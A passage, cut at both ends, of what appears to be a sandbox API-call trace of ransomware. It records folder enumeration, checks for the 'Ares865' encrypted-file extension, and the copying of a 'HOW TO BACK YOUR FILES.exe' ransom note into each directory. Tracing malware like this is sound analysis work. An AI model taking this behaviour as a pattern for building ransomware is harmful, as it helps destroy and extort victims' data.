0x2ccea8 [0042.403] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.403] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.403] lstrcpyW (in: lpString1=0x2e2e904, lpString2="brndlog.bak.Ares865" | out: lpString1="brndlog.bak.Ares865") returned="brndlog.bak.Ares865" [0042.403] lstrlenW (lpString="brndlog.bak.Ares865") returned 19 [0042.403] lstrlenW (lpString="Ares865") returned 7 [0042.403] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.403] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0042.403] lstrcmpiW (lpString1="brndlog.txt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.403] lstrcmpiW (lpString1="brndlog.txt", lpString2="aoldtz.exe") returned 1 [0042.404] lstrcpyW (in: lpString1=0x2e2e904, lpString2="brndlog.txt" | out: lpString1="brndlog.txt") returned="brndlog.txt" [0042.404] lstrlenW (lpString="brndlog.txt") returned 11 [0042.404] lstrlenW (lpString="Ares865") returned 7 [0042.404] lstrcmpiW (lpString1="log.txt", lpString2="Ares865") returned 1 [0042.404] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0042.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.404] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned 75 [0042.404] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0042.404] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.404] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.404] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.404] GetLastError () returned 0x0 [0042.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.404] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.405] CloseHandle (hObject=0x118) returned 1 [0042.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.405] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.405] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.405] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.405] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.405] lstrcpyW (in: lpString1=0x2e2e8f8, lpString2="1NBUR4HR" | out: lpString1="1NBUR4HR") returned="1NBUR4HR" [0042.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2cba28 [0042.405] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.405] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6ASVN7J7", cAlternateFileName="")) returned 1 [0042.405] lstrcmpiW (lpString1="6ASVN7J7", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.405] lstrcmpiW (lpString1="6ASVN7J7", lpString2="aoldtz.exe") returned -1 [0042.405] lstrcpyW (in: lpString1=0x2e2e8f8, lpString2="6ASVN7J7" | out: lpString1="6ASVN7J7") returned="6ASVN7J7" [0042.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2cbae0 [0042.405] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.405] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D68G7BIJ", cAlternateFileName="")) returned 1 [0042.405] lstrcmpiW (lpString1="D68G7BIJ", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.405] lstrcmpiW (lpString1="D68G7BIJ", lpString2="aoldtz.exe") returned 1 [0042.405] lstrcpyW (in: lpString1=0x2e2e8f8, lpString2="D68G7BIJ" | out: lpString1="D68G7BIJ") returned="D68G7BIJ" [0042.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2cbb98 [0042.406] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.406] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.406] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.406] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.406] lstrcpyW (in: lpString1=0x2e2e8f8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.406] lstrlenW (lpString="desktop.ini") returned 11 [0042.406] lstrlenW (lpString="Ares865") returned 7 [0042.406] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.406] lstrcpyW (in: lpString1=0x2e2e8f8, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0042.406] lstrlenW (lpString="index.dat") returned 9 [0042.406] lstrlenW (lpString="Ares865") returned 7 [0042.406] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0042.406] lstrcpyW (in: lpString1=0x2e2e8f8, lpString2="KQMHSVKD" | out: lpString1="KQMHSVKD") returned="KQMHSVKD" [0042.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2cbdb0 [0042.406] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.406] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 0 [0042.406] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.406] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0042.406] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.406] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 84 [0042.406] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.406] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.406] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.407] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.407] GetLastError () returned 0x0 [0042.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.407] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.407] CloseHandle (hObject=0x118) returned 1 [0042.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.407] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.407] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.407] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.408] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.408] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.408] lstrlenW (lpString="desktop.ini") returned 11 [0042.408] lstrlenW (lpString="Ares865") returned 7 [0042.408] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.408] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.408] lstrlenW (lpString="fwlink[1]") returned 9 [0042.408] lstrlenW (lpString="Ares865") returned 7 [0042.408] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.408] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb98 | out: hHeap=0x2b0000) returned 1 [0042.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.408] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 84 [0042.408] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.408] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.408] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.409] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.409] GetLastError () returned 0x0 [0042.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.409] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.409] CloseHandle (hObject=0x118) returned 1 [0042.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.409] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.409] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.409] lstrlenW (lpString="desktop.ini") returned 11 [0042.409] lstrlenW (lpString="Ares865") returned 7 [0042.409] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.409] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.409] lstrlenW (lpString="fwlink[1]") returned 9 [0042.409] lstrlenW (lpString="Ares865") returned 7 [0042.409] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.410] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbae0 | out: hHeap=0x2b0000) returned 1 [0042.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.410] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 84 [0042.410] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.410] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.410] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.410] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.411] GetLastError () returned 0x0 [0042.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.411] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.411] CloseHandle (hObject=0x118) returned 1 [0042.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.411] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.412] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.412] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.412] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.412] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.412] lstrlenW (lpString="desktop.ini") returned 11 [0042.412] lstrlenW (lpString="Ares865") returned 7 [0042.412] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.412] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.412] lstrlenW (lpString="fwlink[1]") returned 9 [0042.412] lstrlenW (lpString="Ares865") returned 7 [0042.412] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.412] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.412] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 84 [0042.412] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.412] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.412] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.413] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.413] GetLastError () returned 0x0 [0042.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.413] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.413] CloseHandle (hObject=0x118) returned 1 [0042.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.413] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.413] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.413] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.413] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.413] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.413] lstrlenW (lpString="desktop.ini") returned 11 [0042.413] lstrlenW (lpString="Ares865") returned 7 [0042.414] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.414] lstrcpyW (in: lpString1=0x2e2e90a, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.414] lstrlenW (lpString="fwlink[1]") returned 9 [0042.414] lstrlenW (lpString="Ares865") returned 7 [0042.414] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.414] lstrcpynW (in: 